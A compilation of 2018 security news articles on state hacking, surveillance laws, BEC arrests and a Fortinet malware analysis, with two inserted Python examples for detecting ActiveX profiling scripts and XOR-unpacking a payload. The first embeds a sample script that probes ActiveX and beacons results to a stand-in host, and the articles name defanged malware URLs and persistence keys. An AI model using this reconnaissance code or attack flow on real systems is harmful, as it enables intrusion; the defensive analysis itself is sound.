Kaspersky is not trusted by some governments due to its alleged ties to Russian intelligence, which has sparked concerns that the company may be spying for Moscow.

The call for a ban on Kaspersky’s products in the European Union is part of a report on cyber defense written by Estonian MEP Urmas Paet of the Committee on Foreign Affairs.

The next-to-last proposal in the report “Calls on the EU to perform a comprehensive review of software, IT and communications equipment and infrastructure used in the institutions in order to exclude potentially dangerous programmes and devices, and to ban the ones that have been confirmed as malicious, such as Kaspersky Lab.”

The resolution was approved with 476 votes in favor and 151 against. In response, Kaspersky Lab’s founder and CEO, Eugene Kaspersky, said his company would be freezing collaboration with Europol and the NoMoreRansom project, and highlighted that the EU’s decision “welcomes cybercrime in Europe.”

Kaspersky is one of the private sector companies that founded NoMoreRansom, and it has helped Europol in several major cybercrime investigations, including a $1 billion cyber-heist.

“[It is] frustrating that there was no investigation, no evidence of any wrongdoing from our side, just references to false allegations from anonymous sources. This is the essence of media-ocracy: fake news → political decisions,” Eugene Kaspersky said on Twitter. “The risks of using our software are purely hypothetical. Just as hypothetical as with any other cybersecurity software of any country. But the risk of becoming a victim of a genuine cyberattack is real – and extremely high. Ergo: EP's political decision plays *for* cybercrime.”

Interestingly, an answer given in April by the European Commissioner for Digital Economy and Society, Mariya Gabriel, in response to a question from Polish politician Anna Fotyga regarding the risks associated with the use of Kaspersky software states that “the Commission has no indication for any danger associated with this anti-virus engine.”

On the other hand, Paet says he stands by his report. “These decisions must be taken seriously, they have not been taken out of the blue but instead have been drawn from various partners and intelligence sources. Considering the overall situation of EU-Russia relations, and Russia’s aggressive behaviour, we should not be taking risks that could cause serious damage to the EU,” he told EURACTIV after the vote.

The report is not legally binding, but it could influence some EU member states, especially since the U.K., the Netherlands and Lithuania have already moved to ban the use of Kaspersky software on sensitive systems. Kaspersky took legal action in the United States in an effort to overturn a decision to prohibit the use of its products by government agencies, but a judge rejected the lawsuit.

Many in the cybersecurity industry are skeptical of the accusations against Kaspersky, especially since no evidence of wrongdoing has been provided and many decisions related to the company appear to be based on media reports.


The security firm has been trying to clear its reputation, first by launching a transparency initiative that included giving partners access to source code, and more recently by announcing a move of core processes from Russia to Switzerland.

DHS HART Biometric Database Raises Security, Civil Liberties Concerns
13.6.2018 securityweek BigBrothers

Protecting the DHS HART National Biometric Database Against Theft and Abuse

In February 2018, Northrop Grumman Corporation announced that it had been awarded a $95 million contract to develop increments one and two of the Department of Homeland Security (DHS) Homeland Advanced Recognition Technology (HART) system.

The announcement said very little about HART, except that it is a "multi-modal processing and matching technology that uses a combination of face, finger and iris biometrics meeting DHS accuracy requirements." It is a database and system designed to incorporate, expand and replace the existing Automated Biometric Identity System (IDENT) built in the 1990s.

Last week the Electronic Frontier Foundation (EFF) provided more information on HART. In a Deeplinks blog, senior staff attorney Jennifer Lynch explained, "The agency's new Homeland Advanced Recognition Technology (HART) database will include multiple forms of biometrics -- from face recognition to DNA, data from questionable sources, and highly personal data on innocent people. It will be shared with federal agencies outside of DHS as well as state and local law enforcement and foreign governments."

HART will support, she expands, "at least seven types of biometric identifiers, including face and voice data, DNA, scars and tattoos, and a blanket category for 'other modalities'. It will also include biographic information, like name, date of birth, physical descriptors, country of origin, and government ID numbers. And it will include data we know to be highly subjective, including information collected from officer 'encounters' with the public and information about people's 'relationship patterns'."

EFF's primary concern over this vast new database of DNA, physical biometrics and social behavior is what it describes as the chilling effect on people exercising their First Amendment-protected rights to speak, assemble and associate. "Data like face recognition makes it possible to identify and track people in real time, including at lawful political protests and other gatherings," she writes.

Through EFF's understanding of the HART project and its concern over civil liberties, we now know more about the DHS biometric database. But there are other concerns beyond civil liberties. Security for this vast trove of the nation's most personal information is never mentioned. Indeed, Northrop Grumman's contract announcement merely states, "A keen focus on safeguarding personally identifiable information as well as ensuring the critical sharing of data across interagency partners underpins the technology."

But government does not have a good track record in securing the data it holds. In 2015, The Office of Personnel Management lost personal information on 21.5 million people to what is generally believed to be Chinese government-sponsored hackers.

In 2010, Chelsea Manning (born Bradley Manning) leaked 750,000 classified or sensitive military and diplomatic documents to WikiLeaks, including the infamous 'collateral murder' Baghdad airstrike video.

In 2013, Edward Snowden exfiltrated and leaked thousands of classified NSA documents exposing NSA and GCHQ clandestine global surveillance programs.

In 2016, the hacking group known as The Shadow Brokers leaked a series of exploits stolen from the Equation Group – believed to be the Tailored Access Operations (TAO) unit of the NSA. One of these exploits, EternalBlue, was used in both the WannaCry ransomware and NotPetya cyberattacks of 2017.

In March 2017, WikiLeaks began publishing a series of CIA classified documents and cybersecurity exploits under the name Vault 7.

These incidents demonstrate that government databases have historically been susceptible to both external hacks and insider breaches. However, the extent to which the HART database will become a magnetic target for hackers is conjecture, and not universally agreed.

Joseph Carson, chief security scientist at Thycotic, doesn't believe the database will be very attractive to hackers. "The only reason this would be attractive to cybercriminals," he told SecurityWeek, "would be to sell it onwards to nation states who would use such data for intelligence or economic advantages. However, the data alone would not be as valuable without the technology that analyzes the metadata for matches and relationships. So, cybercriminals and nation states would need to compromise both to make value of the stolen data."

Others take a different view. "This massive, aggregated database will represent an incomparable trove of intelligence about US citizens. You can be sure it will be a target," said Rick Moy, CMO at Acalvio.

Migo Kedem, director of product management at SentinelOne, adds, "There will be many criminals and states who would like to get their hands on this type of information, ranging from commercial and marketing, through business espionage to state level."

Protecting this database from external hackers, whether organized crime or nation states, is going to be a challenge. But it will be equally difficult to protect it from insiders. According to the EFF's figures, the IDENT fingerprint database already holds data on 220 million individuals, and processes 350,000 fingerprint transactions every day. The full HART database will go far beyond just fingerprints, and will be shared with federal agencies outside of DHS, with state and federal law enforcement, and even with foreign governments.

The ability to control everybody with access to the database will consequently be another challenge – health workers and policemen already covertly query their own databases to provide information for worried friends and relatives. The temptation to check on the relationship patterns of a daughter's new boyfriend – if possible – is just one danger. Looking at private industry, High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek, "Data protection is certainly a high priority in large companies such as Google or Apple, but as we recently saw with Facebook – authorized third-parties are the uncontrollable Achilles' heel."

The subversion of authorized users through bribery, blackmail or stolen credentials is another difficulty. "When human interactions are involved, it is generally the easiest link to compromise," says SentinelOne's Kedem.

Just as securing access to the HART database will be difficult, so too will be securing the use of the database. While it can provide value to its users manually, there is little doubt that machine learning and artificial intelligence will be used to help locate the needles in this massive haystack. This is particularly concerning because of the intention to include 'relationship patterns', which will be more easily sifted with AI than by manual searches.

Indeed, it is tempting to wonder if HART will become the basis for the FBI's often-promised move into 'predictive policing'. Thycotic's Carson believes this is probable. "This goes way back," he said. "'Trapwire' was exposed by Wikileaks back in 2012 resulting from the Stratfor hacks. It reportedly used CCTV surveillance to recognize people from their facial biometrics, how they walked and even from the clothing they wear. The purpose of such technology was prioritized for national security and it has been known that such technology had existed; but this was a clear indication that it was formerly in use. However, it is now clear that such data is being used beyond national security in both government and commercial use for profit and control."

Acalvio's Rick Moy simply said, "Predictive models need tons of data, so it would certainly be an enabler."

But this brings us to the next problem: false positives potentially generated by built-in bias in the artificial intelligence algorithms. Carson is not too concerned: "I would assume the results would have to be verified by a human. The AI and machine learning is typically to find the needle in a haystack and a human is used to validate the results."

Moy, however, does have concerns. "False positives come with any algorithm based on diverse data inputs. Bias is a human trait, and humans are still writing the algorithms. But it's worth noting that there's quite a difference between searching for known features of a past incident versus asking a system what the most relevant features of an incident were, versus predicting who will commit a future crime."

The implication is that use of the HART database to identify suspects is likely to be very accurate; but its use to predict criminal, terrorist or simply anti-social behavior would be worrying. If there is a bias against certain ethnic groups for, say, criminal or terrorist activity within society and existing records, that bias can potentially be transferred to the AI algorithms resulting in damaging and far-reaching false positives.

"US Congress needs to look at the old adage of 'we could, but should we?' while going forward with the DHS HART database," comments Abhishek Iyer, Technical Marketing Manager at Demisto. "AI and ML algorithms often mirror and amplify the biases of the data collected. If DHS investigation will be based on biometric recognition whose accuracy is already compromised by bias, it can lead to wrongful arrests, distress for US travelers, and lost government resources."

There is little doubt that a national biometric database could help law enforcement. But at what cost? The Electronic Frontier Foundation fears it will damage freedom of speech and association, and massively impinge upon personal privacy. But the challenges posed by HART go beyond civil liberties. Securing both access to and use of the data is going to be very difficult.

North Korean Hackers Abuse ActiveX in Recent Attacks
12.6.2018 securityweek  BigBrothers

An ActiveX zero-day vulnerability discovered recently on the website of a South Korean think tank focused on national security has been abused by the North Korean-linked Lazarus group in attacks, AlienVault reports.

ActiveX controls are usually disabled on most systems, but the South Korean government requires that they be enabled on machines in the country. This has led to numerous attacks abusing ActiveX to compromise systems in South Korea, many of them attributed to North Korean hackers.

The same applies to the newly observed attacks, in which JavaScript code was used to exploit several ActiveX vulnerabilities, including a zero-day. Soon after the attacks occurred, local media attributed them to the Andariel gang, which is said to be part of Lazarus, the state-sponsored hacking group considered the most serious threat to banks.

The group, whose financially motivated sub-unit is tracked as BlueNoroff, has orchestrated high-profile attacks such as the devastating attack against Sony Pictures in late 2014 and the $81 million cyber heist from Bangladesh's account at the Federal Reserve Bank of New York in 2016. This year, the actor reportedly switched targets to cryptocurrency, but also hit an online casino in Central America.

According to a new AlienVault report, the Lazarus hackers were behind the recently revealed ActiveX attacks as well.

The group used a profiling script as the initial reconnaissance tool, in an attempt to gather information on possible targets. Although this is a tactic the Lazarus group has employed before, other threat actors use it as well.

The next step of the attack involved scripts capable of gathering additional information from the system and designed to deliver the ActiveX exploit.

In a tweet several weeks ago, Cyber Warfare Intelligence Center and IssueMakersLab founder Simon Choi shared some details on the scripts used in the assault, revealing that an initial reconnaissance stage was deployed in January 2017, while script injections only occurred in late April 2018.

The script was designed to identify the browser and operating system running on the victim's machine and borrows much of its code from PinLady's PluginDetect. When it detects Internet Explorer, the script checks whether ActiveX is enabled and which components from a specific list of ActiveX controls are installed.

AlienVault also notes that one of the other scripts involved in the attack, apparently used for profiling, sends data to a website that might have been compromised a while back, as it was previously recorded as a command and control (C&C) server for Lazarus malware in 2015.

The ActiveX exploit used in the recent assault, also shared by Simon Choi on Twitter, was meant to download malware from peaceind[.]co.kr and save it to the system as splwow32.exe.

“Splwow32.exe is a fairly uncommon filename for malware, and was previously seen in the Taiwan bank heist which has been attributed to another sub-set of the Lazarus attackers. We also note that the peaceind[.]co.kr site has been previously identified as vulnerable,” AlienVault says.

The malware appears to be called Akdoor, a simple backdoor designed to execute commands using Command Prompt. The malware also uses a “distinctive command and control protocol,” the security researchers say.
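The profiling stage described above, as an added example that is not part of the original article or of AlienVault's research: a small static triage script that looks for the three ingredients of such a page (user-agent sniffing for Internet Explorer, ActiveXObject probes against a list of ProgIDs, and a beacon that reports the result back). The embedded JavaScript is a constructed sample written for this example, not the script from the attack; the hostname and the ProgID list in it are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample (not the script from the attack): a shortened profiling page in the
# style described above - a PluginDetect-like browser check, ActiveX probes against a
# fixed list of ProgIDs, and an image beacon carrying the result. Hostname is an example.
SAMPLE_JS = r"""
var ua = navigator.userAgent;
var isIE = /MSIE|Trident\//.test(ua);
function hasAX(id) { try { new ActiveXObject(id); return true; } catch (e) { return false; } }
if (isIE) {
  var probes = ["Scripting.FileSystemObject", "WScript.Shell", "Msxml2.XMLHTTP", "ADODB.Stream"];
  var hits = [];
  for (var i = 0; i < probes.length; i++) { if (hasAX(probes[i])) hits.push(probes[i]); }
  var px = new Image();
  px.src = "http://profiler.example/r.php?v=" + encodeURIComponent(hits.join("|"));
}
"""

# The three building blocks of a profiling script.
UA_SNIFF_RE = re.compile(r"navigator\.(?:userAgent|appName|appVersion)")
IE_MARKER_RE = re.compile(r"MSIE|Trident")
ACTIVEX_CALL_RE = re.compile(
    r"new\s+ActiveXObject\s*\(\s*([A-Za-z_$][\w$]*|\"[^\"]*\"|'[^']*')\s*\)")
# Array literals made only of string constants, e.g. ["WScript.Shell", "ADODB.Stream"].
STRING_LIST_RE = re.compile(
    r"\[\s*((?:\"[^\"]*\"|'[^']*')(?:\s*,\s*(?:\"[^\"]*\"|'[^']*'))*)\s*\]")
STRING_LIT_RE = re.compile(r"\"([^\"]*)\"|'([^']*)'")
PROGID_RE = re.compile(r"^[A-Za-z]\w*(?:\.\w+)+$")      # WScript.Shell, Msxml2.XMLHTTP.6.0 ...
# URLs assigned to a .src property or passed to XMLHttpRequest.open().
BEACON_RE = re.compile(
    r"(?:\.src\s*=|\.open\s*\(\s*[\"'](?:GET|POST)[\"']\s*,)\s*[\"'](https?://[^\"']+)")


@dataclass
class Verdict:
    ua_sniffing: bool
    ie_check: bool
    activex_calls: int
    progids: List[str] = field(default_factory=list)
    beacons: List[str] = field(default_factory=list)

    @property
    def is_profiler(self) -> bool:
        # Probing ActiveX alone is not suspicious (legacy intranet apps do it); probing it
        # only on IE and phoning the answer home is the reconnaissance pattern.
        return self.activex_calls > 0 and self.ie_check and bool(self.beacons)


def extract_progids(js: str) -> List[str]:
    """Collect ProgIDs passed to ActiveXObject directly or listed in a string array."""
    found = set()
    for m in ACTIVEX_CALL_RE.finditer(js):
        arg = m.group(1)
        if arg[0] in "\"'":            # literal argument: strip the quotes
            found.add(arg[1:-1])
    for m in STRING_LIST_RE.finditer(js):
        for dq, sq in STRING_LIT_RE.findall(m.group(1)):
            lit = dq or sq
            if PROGID_RE.match(lit):
                found.add(lit)
    return sorted(found)


def triage(js: str) -> Verdict:
    """Static triage of one script: reports which profiling ingredients are present."""
    return Verdict(
        ua_sniffing=bool(UA_SNIFF_RE.search(js)),
        ie_check=bool(IE_MARKER_RE.search(js)),
        activex_calls=len(ACTIVEX_CALL_RE.findall(js)),
        progids=extract_progids(js),
        beacons=BEACON_RE.findall(js),
    )


if __name__ == "__main__":
    v = triage(SAMPLE_JS)
    print(f"profiler={v.is_profiler} probes={v.progids} beacons={v.beacons}")
```

The verdict deliberately requires all three ingredients: a legacy intranet page that instantiates one ActiveX control and talks to a relative URL is reported with its ProgID but not flagged, while a script that gates the probes on an IE user-agent and ships the results to an absolute URL is.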

U.S. Blacklists Russian Firms Tied to FSB Hacking Ops
12.6.2018 securityweek BigBrothers

The United States placed five Russian companies and three individuals on its sanctions blacklist Monday for allegedly supporting the FSB intelligence agency's hacking operations, including a firm involved in subsea operations.

The US Treasury named Digital Security and two subsidiaries as helping develop offensive cyber capabilities for Russian intelligence services, including the already-sanctioned FSB.

The Kvant Scientific Research Institute was also included on the blacklist, as a state enterprise supervised by the FSB.

In addition, Divetechnoservices and three officials of the firm were sanctioned for supplying and supporting the government's underwater capabilities in monitoring and hacking subsea communications cables around the world.

US officials have become alarmed over the past year at the extent of US-targeted offensive cyber operations that Washington alleges have official backing from Moscow.

Those include the global NotPetya cyber attack, which paralyzed thousands of computers around the world last year; intrusions into the control systems of the US energy grid; and the insertion of trojans into home and company networking devices around the world, which allow both the diversion of data and attacks that could shut down networks.

The sanctions freeze property and assets under US jurisdiction and seek to lock those named out of global financial networks.

Vietnam MPs Approve Sweeping Cyber Security Law
12.6.2018 securityweek BigBrothers

Vietnamese lawmakers on Tuesday approved a sweeping cyber security law which could compel Facebook and Google to take down critical posts within 24 hours, as space for debate is crushed inside the Communist country.

Activists and dissenters are routinely harassed, jailed or tied up in legal cases in Vietnam, a one-party state which is hyper-sensitive to critical public opinion.

Social media and Internet forums have provided a rare platform to share and debate views against authorities.

But the bill, waved through by an overwhelming majority of MPs in the National Assembly, is poised to end that relative freedom.

The law's far-reaching provisions mean internet companies will have to remove posts deemed to be a "national security" threat within a day and store personal information and data of their users inside Vietnam.

"Currently, Google and Facebook store personal data of Vietnamese users in Hong Kong and Singapore," Vo Trong Viet, chairman of National Assembly's defence and security committee told lawmakers.

"Putting data centres in Vietnam will increase expenses for the service providers... but it is necessary to meet the requirements of the country's cyber security."

The new law outlaws material encouraging public gatherings or that "offends" everything from the national flag to the country's leaders and "heroes".

There was no immediate detail of the punishment for violating the new rules.

Only 15 out of the 466 MPs present in the rubber-stamp assembly voted against the bill, which the government says will become law from January 1, 2019.

Rights advocates said it further shrinks the small space for debate.

"In the country's deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities," said Clare Algar of Amnesty International.

"With the sweeping powers it grants the government to monitor online activity, this vote means there is now no safe place left."

The Asia Internet Coalition, an advocacy group acting on behalf of Facebook, Google, Twitter and other tech firms in the region, said it was "disappointed" by the assembly's vote.

"Unfortunately, these provisions, will result in severe limitations on Vietnam's digital economy, dampening the foreign investment climate and hurting opportunities for local businesses and SMEs to flourish inside and beyond Vietnam," said Jeff Paine, managing director of the internet coalition.

The country's conservative leadership, which has been in charge since 2016, is waging a crackdown on activists and dissidents.

At least 26 dissidents and activists have been prosecuted during the first five months of this year, according to Human Rights Watch.

The government has also unveiled a 10,000-strong brigade to fight cybercrimes and "wrongful views" on the internet, according to state media reports.

The unit, dubbed Force 47, is also tasked with fighting anti-state propaganda on the web.

Operation WireWire – Law enforcement arrested 74 individuals involved in BEC scams
12.6.2018 securityaffairs BigBrothers

US authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting BEC scams.
On Monday, the U.S. authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting business email compromise (BEC) scams.

The investigation ran for over six months; 42 suspects were arrested in the United States, 29 in Nigeria, and the remaining three in Canada, Mauritius, and Poland.

Law enforcement seized roughly $2.4 million and was able to disrupt and recover roughly $14 million in fraudulent wire transfers.

“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland.” reads the press note released by the Department of Justice and the FBI.

“The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.”


During Operation WireWire, law enforcement executed more than 51 domestic actions, including search warrants, asset seizure warrants, and money mule warning letters.

The suspects have been involved in schemes targeting businesses of all sizes and individual victims.

According to the DoJ, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. In one case the suspects tricked a real estate closing attorney into wiring $246,000 to their account.

According to a report published by Trend Micro, losses caused by Business Email Compromise (BEC) attacks have kept growing in recent years and are estimated to reach $9 billion in 2018. That estimate also accounts for newer attack vectors, such as the malicious Android applications used by the Dark Caracal campaign attributed to a Lebanese intelligence agency.

BEC frauds have devastating impacts not only on the individual business but also on the global economy.

“Since the Internet Crime Complaint Center (IC3) began formally keeping track of BEC and its variant, e-mail account compromise (EAC), there has been a loss of over $3.7 billion reported to the IC3.” continues the note.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $5.3 billion industry. It emphasizes that attackers rely on social engineering to lure and deceive employees in a myriad of scams that bypass technical security measures. Exploiting human psychology rather than software, as the report puts it, "requires little in the way of special tools or technical knowledge to pull off, instead requiring an understanding of human psychology and knowledge of how specific organizations work."

The report lists how BEC attacks are usually conducted. The techniques are: bogus invoice scheme, CEO fraud, account compromise, attorney impersonation and data theft. It highlights that these attacks can be classified into two major groups: credential grabbing and email-only.

The FBI 2017 Internet Crime Report, which outlines cybercrime trends over the past year, shows BEC/EAC as the top category by reported losses ($676,151,185), followed by Confidence Fraud/Romance ($211,382,989) and Non-Payment/Non-Delivery ($141,110,441).

“BEC is a sophisticated scam targeting businesses that often work with foreign suppliers and/or businesses and regularly perform wire transfer payments. The Email Account Compromise (EAC) variation of BEC targets individuals who regularly perform wire transfer payments.” states the report.

“It should be noted while most BEC and EAC victims reported using wire transfers as their regular method of transferring business funds, some victims reported using checks.”

Today’s announcement highlighting this recent surge in law enforcement resources targeting BEC schemes “demonstrates the FBI’s commitment to disrupt and dismantle criminal enterprises that target American citizens and their businesses,” according to FBI Director Christopher Wray.

And he added, “We will continue to work together with our law enforcement partners around the world to end these fraud schemes and protect the hard-earned assets of our citizens. The public we serve deserves nothing less.”

Crooks used multi-stage attacks aimed at Russian Service Centers
12.6.2018 securityaffairs BigBrothers

Fortinet recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.
Security researchers from Fortinet have recently spotted a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

The researchers noted that the attacks were multi-stage but ruled out the involvement of a nation-state actor.

The attackers sent spear-phishing messages carrying weaponized Office documents that exploit CVE-2017-11882, a 17-year-old flaw in the Office Equation Editor that Microsoft patched in November 2017.

The first attacks were observed at the end of March when crooks sent spear-phishing emails to a service company that repairs Samsung’s electronic devices.

The messages were written in Russian and contained a file named “Symptom_and_repair_code_list.xlsx”.


“FortiGuard Labs discovered a series of attacks targeted at service centers in Russia. These service centers provide maintenance and support for a variety of electronic goods.” reads the post published by Fortinet.

“A distinctive feature of these attacks is their multi-staging. These attacks use forged emails, malicious Office documents with exploits for a vulnerability that is 17 years old, and a commercial version of a RAT that is tucked into five different layers of protective packers.”

The researchers noticed that the body of the email read like the output of a machine translation service, and the email headers showed that the sender's IP address was not associated with the domain in the "From" field.

Each email carried a different XLSX file. The shellcode in the documents first locates LoadLibraryA and GetProcAddress and uses them to resolve the remaining functions it needs to fetch and execute the final payload.

“The two most important functions “imported” by the shellcode are: URLDownloadToFileW and ExpandEnvironmentStringsW.” continues the analysis.

“The purpose of the first one is obvious. The last function is used to determine the exact location where the shellcode should store downloaded payload, since this location will be different under different platforms. Finally, Shellcode downloads a file from the URL: hxxp://brrange.com/imm.exe, stores it in %APPDATA%\server.exe, and then tries to execute it.”

The final payload uses multiple-layer multi-packer protection to avoid detection.

The first layer of protection is the popular ConfuserEx packer, which obfuscates the names of objects, methods and resources.

The next-stage payload is read from those resources, decrypted with DES and executed; the decrypted file, named BootstrapCS, is the second stage of the multi-layer protection.

BootstrapCS is not obfuscated, but it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

These checks detect emulation, sandbox and virtual machine tools so that the code does not run in an analysis environment; the stage also searches for and shuts down specified processes and disables system utilities. It also writes the payload path to the following startup registry keys:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]
Stage 3 is stored in a binary resource named mainfile and represents the third layer of packing: it is encrypted with a simple XOR using the key 0x20.

Once decrypted, the payload is injected into a process chosen according to the value in the settings resource.

The stage 3 payload turns out to be a commercial Remote Administration Tool (RAT) dubbed Imminent Monitor, and at stage 4 the attackers once again used the ConfuserEx packer.

The Imminent Monitor RAT includes five modules that allow the attackers to spy on the victim and control the machine, including its webcam.

The analysis of the C&C servers revealed 50 domains registered by the attackers on the same day, some of them were used by crooks to deliver malware, while others were involved in phishing attacks. The experts also discovered older .XLSX samples that exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” concludes Fortinet.

Further details are included in the IoCs section of the report.

Multi-Stage Attacks Target Service Centers in Russia

11.6.2018 securityweek   BigBrothers

Fortinet security researchers recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

The attacks stand out because of their multi-staging and are believed to have been launched by a non-Russian actor. The attackers used spear-phishing emails and malicious Office documents exploiting CVE-2017-11882, a 17-year-old vulnerability in Office's Equation Editor that Microsoft patched in November 2017 by modifying the binary directly.

The targeted attack started at the end of March with spear-phishing emails received at a service company that repairs Samsung’s electronic devices. Pretending to come from representatives of Samsung, the emails specifically targeted this organization, were written in Russian, and contained a file named Symptom_and_repair_code_list.xlsx, related to the targeted company’s profile.

The emails were likely the result of machine translation, instead of being created by a native Russian speaker, the security researchers reveal. Furthermore, the headers of the email revealed that the IP address of the sender wasn’t related to the domain in the “From” field.

The attackers used different attachments for each email, but all messages had seemingly legitimate .XLSX files attached. Furthermore, all of the documents contained an exploit for the CVE-2017-11882 vulnerability.

The shellcode used in the attacks was meant to perform various tasks to gain access to the LoadLibraryA and GetProcAddress functions that allow it to execute the final payload. It also imports other functions, including one used to determine the exact location where the downloaded payload should be stored.

The payload features multiple-layer multi-packer protection, starting with an initial layer where the well-known ConfuserEx packer was used to obfuscate objects names, along with the names of methods and resources. From these resources, it reads the next stage payload, which is encrypted using DES, and executes the decrypted file.

The decrypted file, named BootstrapCS, is the second stage of the multi-layer protection. While not obfuscated, it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

This stage can check for various emulation, sandbox, and virtual machine tools, and also searches for and shuts down specified processes, in addition to disabling system utilities. It also writes the payload path to startup registry keys, hides the file with system and hidden attributes, and injects the payload in various processes.

A binary resource named mainfile is the encrypted stage 3 of the payload. It is an executable that represents the third level of packing protection: a simple XOR algorithm with the KEY = 0x20 was used for encryption. The decrypted payload is injected into a process based on the value in the settings resource file.

The stage 3 payload references a commercial Remote Administration Tool (RAT) called Imminent Monitor, which anyone can buy directly from the developer (who apparently prohibits malicious use of the program). At stage 4, the researchers once again stumbled upon ConfuserEx.

The main payload of the attack, however, turned out to be the commercial version of the Imminent Monitor RAT, which includes five modules to record videos using the victim’s webcam, to spy on victims, and to control their machines.

The command and control (C&C) servers used in these attacks led the researchers to discover 50 domains registered on the same day, some of which were used to spread malware, while others for phishing attacks. The researchers also discovered older .XLSX samples that use the same C&C but attempt to exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” Fortinet concludes.
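The stage-3 unpacking described in both write-ups above (a resource named mainfile encrypted with a single-byte XOR, key 0x20), as an added example that is neither Fortinet's code nor code from the original articles. It goes slightly beyond the specific case: instead of hard-coding 0x20 it recovers whichever single-byte key was used, from the known "MZ" plaintext at the start of any PE file, and confirms the result by following e_lfanew to the PE signature. The packed resource it operates on is constructed inside the block (a fake PE header, then XOR-encoded), since the real sample is not on the page.

```python
import struct
from typing import Optional, Tuple

MZ = b"MZ"
PE_SIG = b"PE\0\0"


def looks_like_pe(blob: bytes) -> bool:
    """True if blob has a DOS header whose e_lfanew field points at a PE signature."""
    if len(blob) < 0x40 or blob[:2] != MZ:
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return e_lfanew + 4 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == PE_SIG


def xor_single(blob: bytes, key: int) -> bytes:
    """Single-byte XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key for b in blob)


def recover_xor_key(blob: bytes) -> Optional[int]:
    """Known-plaintext recovery of a single-byte XOR key for a packed PE file.

    The first two plaintext bytes of any PE are 'MZ', so byte 0 of the blob fixes the
    only possible key; byte 1 and the PE signature confirm it. Returns None if the blob
    is not a single-byte-XORed PE at all.
    """
    if len(blob) < 2:
        return None
    key = blob[0] ^ MZ[0]
    if (blob[1] ^ key) != MZ[1]:
        return None
    return key if looks_like_pe(xor_single(blob, key)) else None


def unpack_stage3(resource: bytes) -> Tuple[int, bytes]:
    """Decode a 'mainfile'-style resource and return (key, decrypted PE)."""
    key = recover_xor_key(resource)
    if key is None:
        raise ValueError("resource does not decode to a PE with any single-byte XOR key")
    return key, xor_single(resource, key)


def build_fake_pe() -> bytes:
    """Constructed stand-in for a packed executable: a DOS header with e_lfanew = 0x40,
    a PE signature and some filler. It is NOT a runnable program, only enough structure
    for looks_like_pe() to validate."""
    dos = bytearray(0x40)
    dos[0:2] = MZ
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + PE_SIG + b"\x4c\x01" + b"\x00" * 18 + b"filler-section-data" * 4


if __name__ == "__main__":
    # Constructed 'mainfile' resource, encoded with key 0x20 as in the article.
    resource = xor_single(build_fake_pe(), 0x20)
    key, pe = unpack_stage3(resource)
    print(f"recovered key 0x{key:02x}, valid PE header: {looks_like_pe(pe)}")
```

Checking the PE signature, not just the two "MZ" bytes, matters in practice: a resource that happens to start with two bytes differing from "MZ" by the same XOR value would otherwise be reported as a decoded executable.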

Former GCHQ chief Hannigan warns of Russia’s aggressive approach to the cyberspace

11.6.2018 securityaffairs  BigBrothers

According to former GCHQ chief, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.
Former GCHQ chief Robert Hannigan has warned that the availability of hacking tools in the main marketplaces is rapidly changing the threat landscape. Hannigan served as the director of the UK intelligence agency between November 2014 until January 2017.

Threat actors have easy access to attack tools even without specialist knowledge.

Hannigan gave a keynote titled "Weaponising the web: Nation-state hacking and what it means for enterprise cybersecurity" at the Infosec conference in London last week.

Hannigan highlighted the risks associated with operations conducted by nation-state actors, which have increased dramatically over the last five years.

State-sponsored hackers pose a serious risk to enterprises as well as governments; the former GCHQ chief warned that government APT groups use criminal gangs as proxies, which makes attribution harder.

"Nation state attacks using criminal group as a proxy" is a "fairly new issue," Hannigan said. Hacking tools are becoming a commodity for threat actors and represent a problem for companies.

Hannigan mentioned the activity conducted by North Korea-linked APT and Iranian state-sponsored hackers.

North Korean APT groups, like the infamous Lazarus crew, have focused their activity on the SWIFT network as well as cryptocurrency exchanges to steal funds.

“This is a rational state pursuing rational objectives,” explained Hannigan.

Hannigan also warned of intensifying activity by Iranian hackers, who have likewise targeted financial institutions.

Which is the greatest threat?

Russia, of course. Russia-linked APT groups are highly sophisticated and continuously target infrastructure worldwide; in some cases they have demonstrated destructive capabilities, as in the attacks against the Ukrainian power grid.


According to Hannigan, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.

“It’s unclear if that was a mistake or an experiment,” Hannigan said. “Russia seems to be live testing things in cyber, as it has been [on the ground] in Syria, but it’s a doctrine we don’t fully understand.”

The former spy chief highlighted the risks associated with state-sponsored malware like WannaCry, which caused billions of dollars in damage to organizations worldwide and severe problems for critical infrastructure, such as hospitals in the UK.

